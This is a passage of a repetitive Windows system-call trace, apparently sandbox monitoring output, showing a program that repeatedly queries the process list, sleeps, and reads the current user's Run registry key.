BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.594] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.594] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.595] NtClose (Handle=0x274) returned 0x0 [0175.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.603] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.604] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.604] NtClose (Handle=0x274) returned 0x0 [0175.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.618] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.619] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.619] NtClose (Handle=0x274) returned 0x0 [0175.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.632] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.633] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.633] NtClose (Handle=0x274) returned 0x0 [0175.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.645] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.646] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.646] NtClose (Handle=0x274) returned 0x0 [0175.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.658] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.659] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.659] NtClose (Handle=0x274) returned 0x0 [0175.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.670] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.671] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.671] NtClose (Handle=0x274) returned 0x0 [0175.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.690] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.692] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.692] NtClose (Handle=0x274) returned 0x0 [0175.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.703] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.712] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.714] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.714] NtClose (Handle=0x274) returned 0x0 [0175.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.730] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.733] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.733] NtClose (Handle=0x274) returned 0x0 [0175.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.746] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.747] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.748] NtClose (Handle=0x274) returned 0x0 [0175.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.854] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.856] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.856] NtClose (Handle=0x274) returned 0x0 [0175.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.881] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.882] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.882] NtClose (Handle=0x274) returned 0x0 [0175.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 